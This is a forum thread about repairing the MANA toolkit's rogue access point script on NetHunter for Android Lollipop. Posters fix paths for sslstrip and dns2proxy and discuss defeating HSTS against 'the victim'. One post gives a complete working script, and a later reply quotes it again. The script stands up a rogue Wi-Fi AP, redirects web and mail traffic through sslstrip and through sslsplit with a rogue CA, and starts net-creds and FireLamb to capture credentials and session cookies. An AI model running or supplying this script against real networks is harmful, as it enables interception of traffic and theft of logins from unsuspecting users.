Results 1 to 10 of 10

Thread: Mana issues on Nethunter 2.0 / Lollipop

  1. #1
    Join Date
    2014-Nov
    Posts
    41

    Mana issues on Nethunter 2.0 / Lollipop

    Hi guys,

    I'm having issues with mana and Nethunter 2.0 on Lollipop.
    Mana kind of starts and I can connect to the AP but connections are not being forwarded and as far as I can see, the sslstrip process is not running and "iptables -L -n -v" looks pretty generic without all the port forwards for sslstrip/sslsplit.

    This applies to my opo as well as n7 2013 wifi. Booting the OPO into cm11s and NH 1.1 with multirom, it all looks fine.

    Any Ideas? Anyone else having this trouble?

  2. #2
    Join Date
    2014-Nov
    Posts
    41
    Quote Originally Posted by stinkybit View Post
    as far as I can see, the sslstrip process is not running
    At least this part I could solve for myself so far:

    in /usr/share/mana-toolkit/run-mana/start-nat-full-lollipop.sh you first

    Code:
    cd /usr/share/mana-toolkit/sslstrip-hsts/
    and then execute the two python scripts:

    Code:
    python sslstrip.py...
    python dns2proxy.py...
    ..which are not in this location. I changed the script to:
    Code:
    python sslstrip2/sslstrip.py...
    python dns2proxy/dns2proxy.py...

  3. #3
    Join Date
    2015-Aug
    Posts
    7
    Having the exact same problem (nexus 7 2012 wifi, lollipop). I wonder if this is lollipop related and we can restore mana's upstream by downgrading to kitkat and using the dedicated kitkat scripts in the "run-mana" folder.

  4. #4
    Join Date
    2015-Feb
    Posts
    24
    Hi, I think I just fixed this issue, like stinkybit said, it's all about the wrong path setting in start-nat-full-lollipop.sh
    just change the following script
    cd /usr/share/mana-toolkit/sslstrip-hsts/
    python sslstrip.py -l 10000 -a -w /var/lib/mana-toolkit/sslstrip.log&
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    python dns2proxy.py $phy&
    cd -
    to

    cd /usr/share/mana-toolkit/sslstrip-hsts/sslstrip2/
    python sslstrip.py -l 10000 -a -w /var/lib/mana-toolkit/sslstrip.log&
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    cd /usr/share/mana-toolkit/sslstrip-hsts/dns2proxy/
    python dns2proxy.py -i $phy&
    cd -
    and now you should be able to run the script properly.
    However, seems the hsts bypass not working good, the first time the client can be directed to wwww.google.com by typing www.google.com in the url, as well as the wwww.gmail.com , but when I clicked login, it came to error page.....and when I tried again typing www.google.com, it failed going to wwww.google.com.
    So, maybe is this not working anymore? or need to modify the script? as I don't know how to....

  5. #5
    Join Date
    2013-Feb
    Posts
    225
    Thanks for the update. This has been verified and fixed in https://github.com/offensive-securit...2c9dfc42e5394d and will be available in the next upcoming release.

  6. #6
    Join Date
    2014-Nov
    Posts
    41
    Thanks to simonpunk2016 - the second cd-command does a better job than calling the scripts with a relative path as I tried it.

    @muts:
    simonpunk also suggested to call dns2proxy.py with "-i" in front of the interface, which also seems correct to me. This might be fixed as well.

  7. #7
    Join Date
    2015-Feb
    Posts
    24
    You are welcome, but seems the latest google chrome version has defected the hsts bypass from MITMf, I would like to know if you have succeeded to spoof the victim that using latest google chrome version on different OS. In my case, the victim's chrome can detect my attack and prevent victim from browsing any website.

  8. #8
    Join Date
    2014-Nov
    Posts
    41
    I just tried it with the latest chrome version on android and had the following behaviour (same as with fennec, btw):

    http sites are browseable as usual.
    if I browse sites like google.com they fall back to http as long as I don't write "https" explicitly.
    (forced) https-sites give me a warning regarding an untrusted certificate.

    But your problem looks familiar, I think, I had it before - maybe on my windows laptop, but unfortunately can't test it right now.

  9. #9
    Join Date
    2015-Oct
    Posts
    1
    HI guys I just repair this and now it works perfect
    here is moded script
    copy and paste it to /usr/share/mana-toolkit/run-mana/start-nat-full-lollipop.sh

    #!/bin/bash
    upstream=wlan0
    phy=wlan1
    conf=/etc/mana-toolkit/hostapd-karma.conf
    hostapd=/usr/lib/mana-toolkit/hostapd

    echo '1' > /proc/sys/net/ipv4/ip_forward
    rfkill unblock wlan
    echo -- $phy: flushing interface --
    ip addr flush dev $phy
    echo -- $phy: setting ip --
    ip addr add 10.0.0.1/24 dev $phy
    echo -- $phy: starting the interface --
    ip link set $phy up
    echo -- $phy: setting route --
    ip route add default via 10.0.0.1 dev $phy

    # Starting AP and DHCP
    sed -i "s/^interface=.*$/interface=$phy/" $conf
    $hostapd $conf &
    sleep 5
    dhcpd -cf /etc/mana-toolkit/dhcpd.conf $phy
    sleep 5

    # Add fking rule to table 1006
    for table in $(ip rule list | awk -F"lookup" '{print $2}');
    do
    DEF=`ip route show table $table|grep default|grep $upstream`
    if ! [ -z "$DEF" ]; then
    break
    fi
    done
    ip route add 10.0.0.0/24 dev $phy scope link table $table

    # RM quota from chains to avoid errors in iptable-save
    # http://lists.netfilter.org/pipermail...er/002995.html
    iptables -F bw_INPUT
    iptables -F bw_OUTPUT
    # Save
    iptables-save > /tmp/rules.txt
    # Flush
    iptables --policy INPUT ACCEPT
    iptables --policy FORWARD ACCEPT
    iptables --policy OUTPUT ACCEPT
    iptables -F
    iptables -F -t nat
    # Masquerade
    iptables -t nat -A POSTROUTING -o $upstream -j MASQUERADE
    iptables -A FORWARD -i $phy -o $upstream -j ACCEPT
    iptables -t nat -A PREROUTING -i $phy -p udp --dport 53 -j DNAT --to 10.0.0.1

    #SSLStrip with HSTS bypass
    cd /usr/share/mana-toolkit/sslstrip-hsts/sslstrip2/
    python sslstrip.py -l 10000 -a -w /var/lib/mana-toolkit/sslstrip.log&
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    cd /usr/share/mana-toolkit/sslstrip-hsts/dns2proxy/
    python dns2proxy.py -i $phy&
    cd -

    #SSLSplit
    sslsplit -D -P -Z -S /var/lib/mana-toolkit/sslsplit -c /usr/share/mana-toolkit/cert/rogue-ca.pem -k /usr/share/mana-toolkit/cert/rogue-ca.key -O -l /var/lib/mana-toolkit/sslsplit-connect.log \
    https 0.0.0.0 10443 \
    http 0.0.0.0 10080 \
    ssl 0.0.0.0 10993 \
    tcp 0.0.0.0 10143 \
    ssl 0.0.0.0 10995 \
    tcp 0.0.0.0 10110 \
    ssl 0.0.0.0 10465 \
    tcp 0.0.0.0 10025&

    # iptables -t nat -A INPUT -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10080
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 443 -j REDIRECT --to-port 10443
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 143 -j REDIRECT --to-port 10143
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 993 -j REDIRECT --to-port 10993
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 65493 -j REDIRECT --to-port 10993
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 465 -j REDIRECT --to-port 10465
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 25 -j REDIRECT --to-port 10025
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 995 -j REDIRECT --to-port 10995
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 110 -j REDIRECT --to-port 10110

    # Start FireLamb
    /usr/share/mana-toolkit/firelamb/firelamb.py -i $phy &

    # Start net-creeds
    python /usr/share/mana-toolkit/net-creds/net-creds.py -i $phy > /var/lib/mana-toolkit/net-creds.log.

    sleep 5

    echo "Hit enter to kill me"
    read
    pkill dhcpd
    pkill sslstrip
    pkill sslsplit
    pkill hostapd
    pkill python
    # Restore
    iptables-restore < /tmp/rules.txt
    rm /tmp/rules.txt
    # Remove iface and routes
    ip addr flush dev $phy
    ip link set $phy down

  10. #10
    Join Date
    2015-Oct
    Posts
    16
    Quote Originally Posted by patryq9603 View Post
    HI guys I just repair this and now it works perfect
    here is moded script
    copy and paste it to /usr/share/mana-toolkit/run-mana/start-nat-full-lollipop.sh

    #!/bin/bash
    upstream=wlan0
    phy=wlan1
    conf=/etc/mana-toolkit/hostapd-karma.conf
    hostapd=/usr/lib/mana-toolkit/hostapd

    echo '1' > /proc/sys/net/ipv4/ip_forward
    rfkill unblock wlan
    echo -- $phy: flushing interface --
    ip addr flush dev $phy
    echo -- $phy: setting ip --
    ip addr add 10.0.0.1/24 dev $phy
    echo -- $phy: starting the interface --
    ip link set $phy up
    echo -- $phy: setting route --
    ip route add default via 10.0.0.1 dev $phy

    # Starting AP and DHCP
    sed -i "s/^interface=.*$/interface=$phy/" $conf
    $hostapd $conf &
    sleep 5
    dhcpd -cf /etc/mana-toolkit/dhcpd.conf $phy
    sleep 5

    # Add fking rule to table 1006
    for table in $(ip rule list | awk -F"lookup" '{print $2}');
    do
    DEF=`ip route show table $table|grep default|grep $upstream`
    if ! [ -z "$DEF" ]; then
    break
    fi
    done
    ip route add 10.0.0.0/24 dev $phy scope link table $table

    # RM quota from chains to avoid errors in iptable-save
    # http://lists.netfilter.org/pipermail...er/002995.html
    iptables -F bw_INPUT
    iptables -F bw_OUTPUT
    # Save
    iptables-save > /tmp/rules.txt
    # Flush
    iptables --policy INPUT ACCEPT
    iptables --policy FORWARD ACCEPT
    iptables --policy OUTPUT ACCEPT
    iptables -F
    iptables -F -t nat
    # Masquerade
    iptables -t nat -A POSTROUTING -o $upstream -j MASQUERADE
    iptables -A FORWARD -i $phy -o $upstream -j ACCEPT
    iptables -t nat -A PREROUTING -i $phy -p udp --dport 53 -j DNAT --to 10.0.0.1

    #SSLStrip with HSTS bypass
    cd /usr/share/mana-toolkit/sslstrip-hsts/sslstrip2/
    python sslstrip.py -l 10000 -a -w /var/lib/mana-toolkit/sslstrip.log&
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    cd /usr/share/mana-toolkit/sslstrip-hsts/dns2proxy/
    python dns2proxy.py -i $phy&
    cd -

    #SSLSplit
    sslsplit -D -P -Z -S /var/lib/mana-toolkit/sslsplit -c /usr/share/mana-toolkit/cert/rogue-ca.pem -k /usr/share/mana-toolkit/cert/rogue-ca.key -O -l /var/lib/mana-toolkit/sslsplit-connect.log \
    https 0.0.0.0 10443 \
    http 0.0.0.0 10080 \
    ssl 0.0.0.0 10993 \
    tcp 0.0.0.0 10143 \
    ssl 0.0.0.0 10995 \
    tcp 0.0.0.0 10110 \
    ssl 0.0.0.0 10465 \
    tcp 0.0.0.0 10025&

    # iptables -t nat -A INPUT -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10080
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 443 -j REDIRECT --to-port 10443
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 143 -j REDIRECT --to-port 10143
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 993 -j REDIRECT --to-port 10993
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 65493 -j REDIRECT --to-port 10993
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 465 -j REDIRECT --to-port 10465
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 25 -j REDIRECT --to-port 10025
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 995 -j REDIRECT --to-port 10995
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 110 -j REDIRECT --to-port 10110

    # Start FireLamb
    /usr/share/mana-toolkit/firelamb/firelamb.py -i $phy &

    # Start net-creeds
    python /usr/share/mana-toolkit/net-creds/net-creds.py -i $phy > /var/lib/mana-toolkit/net-creds.log.

    sleep 5

    echo "Hit enter to kill me"
    read
    pkill dhcpd
    pkill sslstrip
    pkill sslsplit
    pkill hostapd
    pkill python
    # Restore
    iptables-restore < /tmp/rules.txt
    rm /tmp/rules.txt
    # Remove iface and routes
    ip addr flush dev $phy
    ip link set $phy down
    Can i paste this in the nat-full section of mana on nethunter nexus 7 and click update?
    new to all this :-/

    EDIT: nevermind, got it sorted now :-)
    Last edited by nexusnexus; 2015-10-08 at 22:15.

Similar Threads

  1. NetHunter 1.2 – Lollipop & Nexus 6/9
    By Duane in forum NetHunter General Questions
    Replies: 0
    Last Post: 2016-01-14, 15:26
  2. NetHunter Nexus 7 2012 install issues with Lollipop
    By FlipTheBit in forum Installing NetHunter
    Replies: 1
    Last Post: 2015-12-17, 10:44
  3. Issues found when launching Mana from NetHunter app menu
    By s0b31t in forum NetHunter General Questions
    Replies: 0
    Last Post: 2015-09-27, 20:34
  4. Nethunter Oneplus Lollipop
    By nik012003 in forum NetHunter General Questions
    Replies: 1
    Last Post: 2015-08-13, 16:15
  5. Having a lot of issues getting Mana to work.
    By Altrez in forum NetHunter General Questions
    Replies: 2
    Last Post: 2015-04-13, 12:20

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •